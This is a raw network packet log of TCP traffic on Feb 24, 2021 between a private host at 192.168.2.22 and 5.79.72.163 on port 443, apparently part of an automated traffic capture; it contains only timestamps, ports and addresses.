Feb 24, 2021 12:53:28.071583033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071598053 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071604967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071615934 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071641922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.073954105 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.073975086 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.073992968 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074021101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074028015 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074029922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074050903 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074067116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074069977 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074079990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074093103 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074110031 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074114084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074119091 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074156046 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.074440002 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.074481010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.075305939 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082654953 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082693100 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082711935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082715034 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082729101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082736015 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082757950 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082775116 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082776070 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082818031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082820892 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082839966 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082860947 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082876921 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082878113 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082916021 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082931042 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082973957 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.082977057 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.082978964 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083000898 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083026886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083031893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083040953 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083067894 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083074093 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083095074 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083108902 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083127975 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083136082 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083151102 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083168030 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083170891 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083188057 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083190918 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083205938 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083211899 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083224058 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083244085 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083251953 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083266973 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083282948 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083298922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083301067 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083326101 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083340883 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083359957 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083360910 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083400011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083427906 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083467960 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083471060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083501101 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083511114 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083523989 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083540916 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083544016 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083559990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083578110 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083579063 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083607912 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083620071 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083641052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083648920 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083663940 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083682060 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083698988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083698988 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083731890 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083741903 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083767891 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083770990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083806992 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083812952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083851099 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083853960 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083889008 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083890915 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083914042 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083929062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083935976 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083945990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.083981991 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.083996058 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084003925 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084022999 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084034920 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084038973 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084058046 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084076881 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084086895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084098101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084100962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084117889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084124088 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084129095 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084146023 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084161043 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084165096 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084175110 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084187031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084203005 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084208012 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084213018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084228992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084244967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084250927 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084255934 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084273100 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084289074 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084294081 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084301949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084316969 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084331036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084355116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.084904909 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.084953070 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.087373018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099260092 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099287033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099349976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099586964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099603891 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099620104 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099633932 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099641085 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099658012 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099677086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099699020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099714994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099730015 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099747896 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099764109 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099765062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099785089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099806070 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099807978 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099828959 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099831104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099850893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099853039 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099867105 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099874020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099888086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099896908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099909067 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099937916 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.099956036 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.099971056 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100003958 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100017071 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100034952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100064039 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100087881 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100099087 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100147009 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100234032 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100261927 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100280046 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100284100 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100301027 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100305080 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100318909 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100337029 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100339890 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100358009 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100374937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100383043 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100435972 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.100460052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.100511074 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.101138115 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.102895021 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.102961063 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103138924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103173018 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103192091 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103197098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103209019 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103228092 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103245020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103277922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103347063 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103368998 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103384018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103394985 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103430986 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103470087 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103532076 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103554964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103564978 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103581905 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103590965 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103615999 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103616953 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103637934 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103648901 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103673935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103712082 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103735924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.103748083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.103790045 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.106605053 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.106662989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110210896 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110306978 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110330105 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110351086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110363007 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110443115 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110479116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110562086 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110600948 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110898018 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110928059 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110937119 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110961914 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110964060 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.110985994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.110994101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111008883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111020088 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111032963 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111042976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111063957 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111066103 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111084938 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111097097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111109972 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111175060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111207962 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111228943 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111249924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111265898 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111270905 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111428022 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111464977 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111922026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111944914 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111962080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111970901 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.111978054 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.111999035 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112010956 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112024069 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112026930 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112056971 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112185001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112205029 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112227917 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112238884 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112286091 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112308979 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112323999 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112335920 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112339020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112374067 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112437963 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112458944 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112471104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112492085 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112550974 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112565994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112582922 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112586975 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112596989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112608910 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112659931 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112680912 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112694979 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112709045 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112745047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112782001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112785101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112811089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112812042 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112837076 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112848043 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112871885 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112874031 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112894058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112905025 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112925053 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.112945080 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112974882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.112977982 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113007069 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113008022 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113029957 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113042116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113055944 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113059044 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113096952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113099098 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113130093 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113132000 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113166094 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113168955 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113192081 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113200903 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113224030 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113225937 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113253117 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113265991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113274097 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113286972 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113296032 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113310099 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113316059 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113326073 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113341093 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113353014 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113375902 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113377094 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113415003 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.113440037 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.113472939 CET	49166	443	192.168.2.22	5.79.72.163
